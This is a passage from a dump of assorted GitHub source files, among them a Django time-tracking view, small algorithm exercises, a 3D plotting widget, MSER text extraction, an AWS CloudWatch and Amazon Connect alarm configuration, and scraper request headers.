time_agg.append(dt.timedelta(hours=0))\n day_num.append(date.day)\n for i in range(len(date_entries)):\n if date == date_entries[i]:\n time_agg[-1] += time_diff[i]\n time_agg_int.append(time_agg[-1].total_seconds())\n time_agg_str = str(time_agg[-1])[:-3]\n if len(time_agg_str) == 4:\n time_agg_str = '0'+time_agg_str\n time_agg[-1] = time_agg_str\n \n time_agg_max = max(time_agg_int)\n for i in range(len(time_agg_int)):\n if time_agg_int[i] > 0:\n time_agg_int[i] /= time_agg_max\n time_agg_int[i] = int (time_agg_int[i] * 10)\n\n # calculate number of days between the 1. 
and the last monday before\n first_weekd = d[0].weekday()\n\n time_agg = json.dumps (time_agg)\n time_agg_int = json.dumps (time_agg_int)\n day_num = json.dumps (day_num)\n context = {'curr_date': curr_date.strftime('%d.%m.%Y'), 'date': in_date, 'year_num': year_num, 'month_name': month_name, 'month_str': month_str, 'time_agg': time_agg, 'time_agg_int': time_agg_int, 'day_num': day_num, 'first_weekd': first_weekd}\n\n return render(request, 'zerf/index.html', context)\n\n@csrf_exempt\ndef add_entry(request, in_date):\n\n in_date = dt.datetime.strptime(in_date, \"%d.%m.%Y\").date()\n curr_date = dt.datetime.now()\n sel_month = in_date.month\n sel_year = in_date.year\n day_max = c.monthrange(sel_year, sel_month)[-1]\n if sel_month > 1:\n day_max_prev_month = c.monthrange(sel_year, sel_month-1)[-1]\n else:\n day_max_prev_month = c.monthrange(sel_year-1, 12)[-1]\n \n if request.method == 'POST':\n id_val = tuple( request.POST.getlist('id') )\n starttime_val = request.POST.getlist('stname[]')\n endtime_val = request.POST.getlist('etname[]')\n group_val = request.POST.getlist('grname[]')\n desc_val = request.POST.getlist('descname[]')\n del_val = request.POST.getlist('delname[]')\n \n for i in range(len(starttime_val)):\n if id_val[i] == 'new' and del_val[i] != '1':\n b = Entry(date = in_date, start_time = starttime_val[i], end_time = endtime_val[i], \n group = Group.objects.get(task_group_name=group_val[i]), description = desc_val[i])\n b.save()\n elif id_val[i] != 'new':\n b = Entry.objects.get(id=id_val[i])\n setattr(b, 'start_time', starttime_val[i])\n setattr(b, 'end_time', endtime_val[i])\n setattr(b, 'group', Group.objects.get(task_group_name=group_val[i]))\n setattr(b, 'description', desc_val[i])\n b.save()\n if del_val[i] == '1' and id_val[i] != 'new':\n b = Entry.objects.get(id=id_val[i])\n b.delete()\n \n group_names = Group.objects.values_list('task_group_name', flat = True)\n \n ids_name = list(Entry.objects.filter(date=in_date).values_list('id', flat = True))\n start_name = list(Entry.objects.filter(date=in_date).values_list('start_time', flat = True))\n end_name = list(Entry.objects.filter(date=in_date).values_list('end_time', flat = True))\n group_name = list(Entry.objects.filter(date=in_date).values_list('group', flat = True))\n desc_name = list(Entry.objects.filter(date=in_date).values_list('description', flat = True))\n stock_len = len(start_name)\n \n for i in range(stock_len):\n start_name[i] = start_name[i].strftime(\"%H:%M\")\n end_name[i] = end_name[i].strftime(\"%H:%M\")\n group_name[i] = getattr(Group.objects.get(id=group_name[i]),'task_group_name')\n \n ids_entries = json.dumps (ids_name)\n start_entries = json.dumps (start_name)\n end_entries = json.dumps (end_name)\n group_entries = json.dumps (group_name)\n desc_entries = json.dumps (desc_name)\n\n return render(request, 'zerf/add_entry.html', \n {'curr_date': curr_date.strftime('%d.%m.%Y'), 'date': in_date.strftime('%d.%m.%Y'), 'group_names': group_names, 'stock_len': stock_len, \n 'ids_entries': ids_entries, 'start_entries': start_entries, 'end_entries': end_entries, \n 'group_entries': group_entries, 'desc_entries': desc_entries, 'day_max': day_max, 'day_max_prev_month': day_max_prev_month})","repo_name":"MarkusDunkel/productivity_recording_app","sub_path":"app/zerf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23818915086","text":"'''\nProblem statement- given a maze of 1s 
with obstacles (represented by 0).\nWe have to print all the possible paths to the end.\nLogical intuition- We have to explore all the possible paths hence our mouse\nwill move in all four directions untill it reaches the end\n'''\n\n\ndef printPathHelper(i, j, maze, n, solution):\n '''\n Summary Line:\n This funcion helps us to print the path followed by the rat in the maze.\n It puts 1s at places that the mouse can go and 0s\n at places where the mouse doesn't go.\n\n Args:\n i- current position on the maze horizontally\n j- current position on the maze vertically\n maze- The 2D matrix that was inputted through which the Rat has to pass\n n- side of the 2D matrix\n solution- solution matrix to be returned\n '''\n if i == n-1 and j == n-1:\n print()\n solution[i][j] = 1\n for i in range(n):\n for j in range(n):\n print(solution[i][j], end=\" \")\n print()\n solution[i][j] = 0\n return\n if i < 0 or j < 0 or i >= n or j >= n or\\\n maze[i][j] == 0 or solution[i][j] == 1:\n return\n solution[i][j] = 1\n printPathHelper(i+1, j, maze, n, solution)\n printPathHelper(i, j+1, maze, n, solution)\n printPathHelper(i-1, j, maze, n, solution)\n printPathHelper(i, j-1, maze, n, solution)\n solution[i][j] = 0\n return\n\n\ndef printPath(maze):\n '''\n Summary Line:\n This function helps us to take form a solution matrix and calls\n another method printPathHelper() on the solution matrix\n to print all possible paths for the mouse.\n\n Args:\n maze- The 2D matrix that was inputted through which the Rat has to pass\n '''\n n = len(maze)\n solution = [[0 for j in range(n)]for i in range(n)]\n printPathHelper(0, 0, maze, n, solution)\n\nif __name__ == '__main__':\n n = int(input())\n maze = []\n for j in range(n):\n arr = [int(i) for i in input().split()]\n maze.append(arr)\n j += 1\n printPath(maze)\n\n'''\nSample input-\n4\n1 1 1 1\n1 1 0 1\n1 0 1 1\n1 1 1 1\n\nIllustration for the maze-\n(Obstacles at positions where there is 0 in the input matrix)\n 0 1 2 3\n +-------+-------+-------+-------+\n | | | | |\n 0 | | | | |\n | | | | |\n +---------------+-------+-------+\n | | | | |\n 1 | | | x | |\n | | | | |\n +-------+-------+-------+-------+\n | | | | |\n 2 | | x | | |\n | | | | |\n +-------+-------+-------+-------+\n | | | | |\n 3 | | | | |\n | | | | |\n +-------+-------+-------+-------+\n\nSample Output-\nAll possible paths will be printed\n\nTime complexity- O(2^(n^2))\n'''\n","repo_name":"HarshCasper/NeoAlgo","sub_path":"Python/backtracking/RatInMaze.py","file_name":"RatInMaze.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"3"} +{"seq_id":"33422887415","text":"from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal\nimport pyqtgraph.opengl as gl\nimport numpy as np\nimport sys\n\nfrom matplotlib import cm\n\n\n# open3d is nice, but kind of rigid in how it is built. Not very changeable. Also QT support might be coming but is\n# not there yet. 
They are using this im gui thing?\n# https://github.com/intel-isl/Open3D/issues/1161\n\n# this instead?\n# https://pyqtgraph.readthedocs.io/en/latest/how_to_use.html#embedding-widgets-inside-pyqt-applications\n\n# mayavi?\n# https://docs.enthought.com/mayavi/mayavi/auto/example_qt_embedding.html#example-qt-embedding\n\n# this has basic plotting and is good for dask\n# https://hvplot.holoviz.org/user_guide/index.html\n\n# holoviz for plots straight from dask\n# http://holoviews.org/user_guide/Dashboards.html\n\n# dash + datashader\n# https://github.com/plotly/plotly.py/issues/1266\n\n# https://doc.qt.io/qt-5/qtdatavisualization-scatter-example.html\n\n\nclass Kluster3dview(gl.GLViewWidget):\n \"\"\"\n Currently using pyqtgraph opengl widgets for 3d plotting. It is pretty basic, and I haven't spent much time on\n this. This is sort of a placeholder for what we might want eventually.\n\n Can plot points and surfaces.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.opts['distance'] = 20\n self.setWindowTitle('kluster 3dview')\n\n self.grid = gl.GLGridItem()\n self.addItem(self.grid)\n\n self.ptstore = []\n self.surfstore = []\n\n def add_point_dataset(self, x, y, z):\n \"\"\"\n Plot the provided xyz numpy arrays. Centers the data in the plot using translate.\n\n Store the plot object to self.ptstore so we can remove it later.\n\n Parameters\n ----------\n x: numpy array, x value\n y: numpy array, y value\n z: numpy array, z value\n\n \"\"\"\n pts = np.c_[x, y, -z]\n\n cmap = cm.get_cmap('viridis', 100)\n normz = (z/np.max(z) * 99).astype(np.int16)\n color = cmap.colors[normz]\n\n scatterplt = gl.GLScatterPlotItem(pos=pts, color=color, size=1)\n scatterplt.translate(-np.nanmean(x), -np.nanmean(y), -np.nanmean(z))\n scatterplt.setData()\n\n self.ptstore.append(scatterplt)\n self.addItem(self.ptstore[-1])\n\n def add_surface_dataset(self, x, y, z):\n \"\"\"\n Plot the provided xyz node locations as a surface. 
Centers the data in the plot using translate\n\n Store the plot object to self.ptstore so we can remove it later.\n\n Parameters\n ----------\n x: numpy array, x value\n y: numpy array, y value\n z: numpy array, z value\n\n \"\"\"\n surfplt = gl.GLSurfacePlotItem(x=x, y=y, z=z, shader='normalColor')\n surfplt.translate(-np.nanmean(x), -np.nanmean(y), -np.nanmean(z))\n surfplt.setData()\n\n self.surfstore.append(surfplt)\n self.addItem(self.surfstore[-1])\n\n def clear_plot_area(self):\n \"\"\"\n Clear all the plotted surfaces/points that were stored to the stores.\n \"\"\"\n for sf in self.surfstore:\n self.removeItem(sf)\n for pd in self.ptstore:\n self.removeItem(pd)\n self.ptstore = []\n self.surfstore = []\n\n\nif __name__ == '__main__':\n try: # pyside2\n app = QtWidgets.QApplication()\n except TypeError: # pyqt5\n app = QtWidgets.QApplication([])\n\n try:\n test_window_one = Kluster3dview()\n from HSTB.kluster.fqpr_convenience import reload_data\n fq = reload_data(r\"C:\\collab\\dasktest\\data_dir\\hassler_acceptance\\refsurf\\converted\", show_progress=False)\n test_window_one.add_point_dataset(fq.soundings.x.values, fq.soundings.y.values, fq.soundings.z.values)\n fq.client.close()\n test_window_one.show()\n\n test_window_two = Kluster3dview()\n from HSTB.kluster.fqpr_surface import BaseSurface\n surf = BaseSurface(from_file=r\"C:\\collab\\dasktest\\data_dir\\hassler_acceptance\\refsurf\\converted\\surf.npz\")\n x, y, z, valid = surf.return_surf_xyz()\n test_window_two.add_surface_dataset(x, y, z)\n test_window_two.show()\n\n except AttributeError: # cant find the folder, so use this test data\n # use some non-(0,0,0) centered data to test the translation\n test_window_one = Kluster3dview()\n test_window_one.add_point_dataset(np.array([2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007]),\n np.array([2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010]),\n np.array([2002, 2007, 2008, 2009, 2010, 2011, 2012, 2013]))\n test_window_one.show()\n\n test_window_two = Kluster3dview()\n test_window_two.add_surface_dataset(np.array([2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007]),\n np.array([2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010]),\n np.random.random((8,8)))\n test_window_two.show()\n\n sys.exit(app.exec_())\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/archive/kluster_3dview.py","file_name":"kluster_3dview.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"38397673892","text":"# open google.com\r\n# perform a search\r\n\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n\r\nclass ChromeDriverWindows():\r\n def test(self):\r\n baseUrl = \"https://google.com\"\r\n driver = webdriver.Chrome(executable_path=\"D:\\\\IT materials\\\\Exercises&Homework\\\\Drivere\\\\chromedriver.exe\")\r\n driver.get(baseUrl)\r\n time.sleep(10)\r\n\r\n element = None\r\n element = driver.find_element_by_name(\"q\")\r\n if element is not None:\r\n print(\"We found element by name\")\r\n \r\n element.send_keys(\"selenium\")\r\n element.submit()\r\n \r\n\r\n\r\nincercare = ChromeDriverWindows()\r\nincercare.test()\r\n","repo_name":"razvitesting/Automation-Testing","sub_path":"SearchGoogle.py","file_name":"SearchGoogle.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30209900475","text":"from matplotlib import pyplot as plt\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", 
\"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\nvisits_per_month = [9695, 7909, 10831, 12942, 12495, 16794, 14161, 12762, 12777, 12439, 10309, 8724]\n\n# numbers of limes of different species sold each month\nkey_limes_per_month = [92.0, 109.0, 124.0, 70.0, 101.0, 79.0, 106.0, 101.0, 103.0, 90.0, 102.0, 106.0]\npersian_limes_per_month = [67.0, 51.0, 57.0, 54.0, 83.0, 90.0, 52.0, 63.0, 51.0, 44.0, 64.0, 78.0]\nblood_limes_per_month = [75.0, 75.0, 76.0, 71.0, 74.0, 77.0, 69.0, 80.0, 63.0, 69.0, 73.0, 82.0]\n\n# create your figure here\nplt.figure(figsize=(12,8))\n\nax1 = plt.subplot(1,2,1)\n\nx_values = range(len(months))\nplt.plot(x_values,visits_per_month,marker='o')\nplt.xlabel(\"Months\")\nplt.ylabel(\"Page Visits\")\nax1.set_xticks(x_values)\nax1.set_xticklabels(months)\nplt.title(\"Page visit per month\")\nplt.margins(0.05,0.05)\n\nax2 = plt.subplot(1,2,2)\nplt.plot(x_values,key_limes_per_month,color=\"brown\",marker='s')\nplt.plot(x_values,persian_limes_per_month,color=\"yellow\",marker='^')\nplt.plot(x_values,blood_limes_per_month,color=\"red\",marker='p')\nplt.xlabel(\"Months\")\nplt.ylabel(\"Lime Sales\")\nax2.legend([\"Key Limes\",\"Persian Limes\",\"Blood Limes\"])\nax2.set_xticks(x_values)\nax2.set_xticklabels(months)\nplt.title(\"Lime Sales per month\")\nplt.margins(0.05,0.05)\n\nplt.savefig(\"Page_visits_and_Lime_sales.png\")\nplt.show()\n\n","repo_name":"arnobchanda/Sublimes-Limes-Project-Codecademy-","sub_path":"sublimeLimes.py","file_name":"sublimeLimes.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4970025739","text":"import sys\r\ninput = sys.stdin.readline\r\ndp=list(list([0]*21 for i in range(21)) for j in range(21))\r\nfor i in range(21):\r\n for j in range(21):\r\n for k in range(21):\r\n if i == 0 or j== 0 or k== 0:\r\n dp[k][j][i] = 1\r\nfor i in range(1,21):\r\n for j in range(1,21):\r\n for k in range(1,21):\r\n if i < j and j < k:\r\n dp[k][j][i] = dp[k-1][j][i] + dp[k-1][j-1][i] - dp[k][j-1][i]\r\n else:\r\n dp[k][j][i] = dp[k][j][i-1] + dp[k][j-1][i-1] + dp[k-1][j][i-1] - dp[k-1][j-1][i-1]\r\n\r\nwhile True:\r\n a , b, c = map(int, input().split())\r\n if (a,b,c) == (-1,-1,-1):\r\n break\r\n if a<=0 or b <=0 or c <= 0:\r\n result = 1\r\n elif a>20 or b>20 or c>20:\r\n result = dp[20][20][20]\r\n else:\r\n result = dp[c][b][a]\r\n\r\n print(f'w({a}, {b}, {c}) = {result}')\r\n","repo_name":"goeom77/algorithm","sub_path":"백준/Silver/9184. 
신나는 함수 실행/신나는 함수 실행.py","file_name":"신나는 함수 실행.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1546540915","text":"# Given the root of a binary tree, return all root-to-leaf paths in any order.\n\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def binary_tree_paths(self, root: TreeNode) -> List[str]:\n \"\"\"Return all root-to-leaf paths in a binary tree using a recursive\n depth-first search algorithm in linear space and time.\"\"\"\n if not root:\n return []\n\n value = str(root.val)\n paths = []\n children = list(filter(None, [root.left, root.right]))\n for child in children:\n paths.extend(self.binary_tree_paths(child))\n for index, path in enumerate(paths):\n paths[index] = f\"{value}->{path}\"\n if not paths:\n paths.append(value)\n return paths\n","repo_name":"patricktsandin/leetcode","sub_path":"leetcode/easy/python/binary_tree_paths/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16847831029","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nimport numpy as np\nimport cv2 as cv\nfrom arguments import Arguments\nfrom components import Components\nfrom component_evaluation import eliminate_insiders, filter_neighbors, eliminate_tiny\n\n\ndef extract_mser(img, args):\n '''\n Function using mser module from the openCV library to extract maximally stable extremal regions.\n Additionally MSERs that lie inside others or have no neighbors are eliminated.\n\n Args:\n img (ndarray): image from which MSERs are to be extracted\n args (Arguments instance):\n\n Returns:\n an instance of the Components class\n '''\n # find MSERs\n mser = cv.MSER_create()\n mser.setMinArea(args.min_area)\n mser.setMaxArea(args.max_area)\n mser.setDelta(args.delta)\n msers, bboxes = mser.detectRegions(img)\n\n #bringing bboxes into the format [x_min, x_max, y_min, y_max]\n bboxes = [[box[1], box[1]+box[3], box[0], box[0]+box[2]] for box in bboxes]\n components = Components(regions=msers, boxes=bboxes, img=img.astype(np.float32)/np.max(img))\n\n #components.show_img()\n\n eliminate_insiders(components)\n\n filter_neighbors(components, args)\n\n eliminate_tiny(components, args.pixel_threshold_factor)\n\n return components\n\n\nif __name__ == '__main__':\n\n args = Arguments()\n\n img = cv.imread('data_test/2.jpg')\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n scaled = cv.resize(gray, None, fx=0.5, fy=0.5)\n print(np.min(scaled))\n print('scaled image:', scaled.shape)\n\n components = extract_mser(scaled, args)\n components.show_img()\n\n","repo_name":"lucasmllr/text_recogition_project","sub_path":"mser_extraction.py","file_name":"mser_extraction.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38792323789","text":"import os\nimport pybryt\n\n\ndef pybryt_reference(lecture, exercise):\n basename = os.path.join('pybryt-references',\n f'exercise-{lecture}_{exercise}')\n pyfilename = f'{basename}.py'\n pklfilename = f'{basename}.pkl'\n\n if os.path.isfile(pyfilename):\n pybryt.ReferenceImplementation.compile(pyfilename).dump(pklfilename)\n elif not os.path.isfile(pklfilename):\n raise 
FileNotFoundError('Reference pkl file does not exists.')\n\n return pklfilename\n","repo_name":"marijanbeg/pybryt-examples","sub_path":"examples/lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38287876324","text":"import logging\nimport json\n\n\nclass BaseConfig(object):\n # AWS 区域, 限 cn-northwest-1, cn-north-1\n REGION_NAME = 'cn-north-1'\n\n # CloudWatch 需要的 IAM Role\n _assume_policy = {\n \"Version\": \"2008-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"ec2.amazonaws.com.cn\"\n },\n \"Action\": \"sts:AssumeRole\"\n }\n ]\n }\n CWA_ROLE_CONFIG = {\n 'Name': 'CloudWatchAgentServerRole',\n 'Assume_Policy': json.dumps(_assume_policy),\n 'Policy_List': [\n 'arn:aws-cn:iam::aws:policy/CloudWatchAgentServerPolicy',\n 'arn:aws-cn:iam::aws:policy/AmazonSSMManagedInstanceCore'\n ]\n }\n\n # 通过此 tag 选择被管理的 EC2\n MANAGE_TAG = {\n 'Key': 'Managed',\n 'Values': ['Yes']\n }\n\n # 存储在 SSM Parameter Store 中的 CloudWatch Agent 参数名称\n CWAC_PARAMETER_NAME = 'CloudWatch-Agent-Configure'\n\n # 允许 SSM Agent 失联分钟数\n SSMA_PING_TIMEOUT_IN_MINUTES = 10\n\n # CloudWatch Agent 参考设置\n CWA_CONFIG = {\n \"agent\": {\n \"metrics_collection_interval\": 60,\n \"run_as_user\": \"root\"\n },\n \"metrics\": {\n \"append_dimensions\": {\n \"InstanceId\": \"${aws:InstanceId}\"\n },\n \"metrics_collected\": {\n \"mem\": {\n \"measurement\": [\n \"mem_used_percent\"\n ],\n \"metrics_collection_interval\": 60\n },\n \"swap\": {\n \"measurement\": [\n \"swap_used_percent\"\n ],\n \"metrics_collection_interval\": 60\n }\n }\n },\n \"logs\": {\n \"logs_collected\": {\n \"files\": {\n \"collect_list\": [\n {\n \"file_path\": \"/var/log/messages\",\n \"log_group_name\": \"amazon-cloudwatch-agent\",\n \"log_stream_name\": \"messages.log\",\n \"timezone\": \"UTC\"\n },\n {\n \"file_path\": \"/opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log\",\n \"log_group_name\": \"amazon-cloudwatch-agent\",\n \"log_stream_name\": \"amazon-cloudwatch-agent.log\",\n \"timezone\": \"Local\"\n }\n ]\n }\n },\n \"log_stream_name\": \"cw_agent_ec2_logs\",\n \"force_flush_interval\": 15\n }\n }\n\n # SNS 报警 Topic 名称\n SNS_TOPIC_NAME = 'CloudWatch-Alarms'\n\n # 存海外区域 AK/SK 的参数名\n AKSK_PARAMETER_NAME = 'Global-AccessKeySecretKey-Pair'\n\n # Amazon Connect 配置\n CONNECT_CONFIG = {\n 'Region_Name': 'ap-northeast-1',\n 'Instance_Id': '44f835ce-e848-4fc1-a251-022b6bcf87d2',\n 'Attribute_Name': 'alarm_content'\n }\n\n # Amazon Connect Contact Flow content\n CONTACT_FLOW_CONTENT = {\n \"Version\": \"2019-10-30\",\n \"StartAction\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Actions\": [\n {\n \"Identifier\": \"806a6d97-dd49-4ce3-b3d8-34cf83dfb47a\",\n \"Parameters\": {\n \"SSML\": \"$.Attributes.{}\".format(CONNECT_CONFIG['Attribute_Name'])\n },\n \"Transitions\": {\n \"NextAction\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"MessageParticipant\"\n },\n {\n \"Identifier\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Type\": \"DisconnectParticipant\",\n \"Parameters\": {},\n \"Transitions\": {}\n },\n {\n \"Identifier\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Parameters\": {\"LoopCount\": \"2\"},\n \"Transitions\": {\n \"NextAction\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Errors\": [],\n \"Conditions\": [\n {\n \"NextAction\": \"e14a0513-6ec4-4666-92e3-5abda0ceb063\",\n \"Condition\": {\n 
\"Operator\": \"Equals\",\n \"Operands\": [\"DoneLooping\"]\n }\n },\n {\n \"NextAction\": \"806a6d97-dd49-4ce3-b3d8-34cf83dfb47a\",\n \"Condition\": {\n \"Operator\": \"Equals\",\n \"Operands\": [\"ContinueLooping\"]\n }\n }\n ]\n },\n \"Type\": \"Loop\"\n },\n {\n \"Identifier\": \"778d8127-cce4-4e3e-9d01-e6971b543bfe\",\n \"Parameters\": {\n \"SSML\": \"<speak>您好,我是知语,来自于<lang xml:lang=\\\"en-US\\\">Amazon Connect</lang></speak>\"\n },\n \"Transitions\": {\n \"NextAction\": \"7cdafb0a-ab10-4e0d-aa95-e9c80dc12d05\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"MessageParticipant\"\n },\n {\n \"Identifier\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Parameters\": {\"TextToSpeechVoice\": \"Zhiyu\"},\n \"Transitions\": {\n \"NextAction\": \"778d8127-cce4-4e3e-9d01-e6971b543bfe\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"UpdateContactTextToSpeechVoice\"\n },\n {\n \"Identifier\": \"f5c4308e-a367-478f-91b6-a56115c81169\",\n \"Parameters\": {\n \"FlowLoggingBehavior\": \"Enabled\"\n },\n \"Transitions\": {\n \"NextAction\": \"c6ab0cc6-24e2-4519-a5a1-a99b0ab94d4e\",\n \"Errors\": [],\n \"Conditions\": []\n },\n \"Type\": \"UpdateFlowLoggingBehavior\"\n }\n ]\n }\n\n # Lambda 需要的 IAM role\n LAMBDA_ROLE_CONFIG = {\n 'Name': 'LambdaFunctionCalloutExecutionRole',\n 'Assume_Policy': json.dumps(\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"lambda.amazonaws.com\"\n },\n \"Action\": \"sts:AssumeRole\"\n }\n ]\n }\n ),\n 'Policy_List': [\n 'arn:aws-cn:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole',\n 'arn:aws-cn:iam::aws:policy/AWSXRayDaemonWriteAccess'\n ]\n }\n\n # Lambda Function 名称\n LAMBDA_FUNCTION_NAME = 'fun-connect-outbound'\n\n\nclass DevConfig(BaseConfig):\n DEBUG = True\n LOGLEVEL = logging.DEBUG\n\n\nclass TestConfig(BaseConfig):\n LOGLEVEL = logging.DEBUG\n\n\nclass ProdConfig(BaseConfig):\n LOGLEVEL = logging.ERROR\n\n\nconfig = DevConfig()\n","repo_name":"laolongju/cloudwatch_alarm_automation","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43359279359","text":"from execjs import get as execjs_get\nfrom time import ctime as t_ctime\nfrom os import makedirs as make_dir\n\n__APP_JS_PATH = \"./js/app.js\"\n__APP_JS_ERROR_PATH = \"../javascript/app.js\"\nDATA_ALBUMS = \"./data/albums/\"\nUNKNOWN_ERROR = \"unknown-error\"\nTIMED_OUT_TIME = 20\nTIMED_OUT = \"TIMED_OUT\"\nF_js_De = \"De\"\nF_js_encode_url = \"encode_url\"\nF_js_decode_url = \"decode_url\"\n\nnode = execjs_get()\nctx = None\ntry:\n with open(__APP_JS_PATH, \"r\", encoding=\"utf-8\") as fp:\n ctx = node.compile(fp.read())\nexcept FileNotFoundError:\n with open(__APP_JS_ERROR_PATH, 'r', encoding=\"utf-8\") as fp:\n ctx = node.compile(fp.read())\n\n_LoggerFlag = True\n__LoggerFilePath = f\"../data/log/{t_ctime()}.log\"\nmake_dir('/'.join(__LoggerFilePath.split('/')[:-1]), exist_ok=True)\nWriteLogToFile = False\nif WriteLogToFile:\n with open(__LoggerFilePath, 'w', encoding='utf-8') as fp:\n fp.write(f\"====== start time: [{t_ctime()}] =========\\n\")\n\n\ndef get_logger_file():\n return open(__LoggerFilePath, 'a+', encoding='utf-8')\n\n\ndef close_logger_file(logger_file_fp):\n logger_file_fp.close()\n\n\nTHE_URL = 
\"https://girlimg.epio.app/api/articles?lang=en-us&filter={\\\"where\\\":{\\\"tag\\\":\\\"all\\\",\\\"lang\\\":\\\"en-us\\\"},\\\"limit\\\":20,\\\"skip\\\":\"\n__ACCEPT = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n__ACCEPT_ENCODING = \"gzip,deflate,br\"\n__ACCEPT_LANGUAGE = \"zh-CN,zh;q=0.9,en;q=0.8,pl;q=0.7,de;q=0.6\"\n__CACHE_CONTROL = \"max-age=0\"\n__CONNECTION = \"keep-alive\"\n__SEC_FETCH_DEST = \"document\"\n__SEC_FETCH_MODE = \"navigate\"\n__SEC_FETCH_SITE = \"none\"\n__SEC_FETCH_USER = \"?1\"\n__UPGRADE_INSECURE_REQUESTS = \"1\"\n__USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\"\n\npage_headers = {\n \"Accept\": __ACCEPT,\n \"Accept-Encoding\": __ACCEPT_ENCODING,\n \"Accept-Language\": __ACCEPT_LANGUAGE,\n \"Cache-Control\": __CACHE_CONTROL,\n \"Connection\": __CONNECTION,\n \"Host\": \"girlimg.epio.app\",\n \"Sec-Fetch-Dest\": __SEC_FETCH_DEST,\n \"Sec-Fetch-Mode\": __SEC_FETCH_MODE,\n \"Sec-Fetch-Site\": __SEC_FETCH_SITE,\n \"Sec-Fetch-User\": __SEC_FETCH_USER,\n \"Upgrade-Insecure-Requests\": __UPGRADE_INSECURE_REQUESTS,\n \"User-Agent\": __USER_AGENT\n}\nalbum_headers = {\n \"Accept\": \"*/*\",\n \"Content-Type\": \"application/json\",\n \"Referer\": None,\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\"\n}\nmypic_net_headers = {\n \"accept\": __ACCEPT,\n \"accept-encoding\": __ACCEPT_ENCODING,\n \"accept-language\": __ACCEPT_LANGUAGE,\n \"cache-control\": __CACHE_CONTROL,\n \"sec-fetch-dest\": __SEC_FETCH_DEST,\n \"sec-fetch-mode\": __SEC_FETCH_MODE,\n \"sec-fetch-site\": __SEC_FETCH_SITE,\n \"sec-fetch-user\": __SEC_FETCH_USER,\n \"upgrade-insecure-requests\": __UPGRADE_INSECURE_REQUESTS,\n \"user-agent\": __USER_AGENT\n}\nepio_headers = {\n \"User-Agent\": __USER_AGENT,\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-us\",\n \"Connection\": __CONNECTION,\n \"Accept-Encoding\": __ACCEPT_ENCODING,\n \"Host\": \"cdn1-images.epio.app\"\n}\npic_headers = {\n \"accept\": __ACCEPT,\n \"accept-encoding\": __ACCEPT_ENCODING,\n \"accept-language\": __ACCEPT_LANGUAGE,\n \"cache-control\": __CACHE_CONTROL,\n \"connection\": __CONNECTION,\n \"sec-fetch-dest\": __SEC_FETCH_DEST,\n \"sec-fetch-mode\": __SEC_FETCH_MODE,\n \"sec-fetch-site\": 